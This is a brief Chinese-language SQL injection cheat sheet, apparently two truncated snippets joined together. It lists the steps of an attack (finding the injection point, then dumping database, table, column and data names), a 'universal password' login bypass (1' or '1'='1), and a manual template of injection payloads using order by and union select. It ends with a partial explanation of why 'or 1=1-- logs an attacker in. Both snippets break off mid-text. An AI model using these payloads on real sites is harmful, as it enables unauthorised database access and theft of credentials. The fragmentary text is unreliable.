01-判断漏洞类型(字符型和数字型)02-爆库名03-报表名04-爆字段05-爆数据值万能密码:username:1' or '1'='1password:1' or '1'='1 手注模板: id=1#判断注入点id=1' #判断注入点id=1'and1=1#判断注入点id=1' and 1=2 #判断注入点id=1'orderby3--+ #判断字段数id=-1' union select 1,da...
SELECT * FROM admin WHERE Name='123' or 1=1--'and Password='123' 2、现在我们来分析一下:'or 1=1--为什么能登录系统,原因有如下: (1)、SELECT * FROM admin WHERE Name=''or 1=1 首先看这条查询语句,查询所有来自admin表的数据,条件name为空或者1=1,这两个条件只要一个满足就为真, Name=''...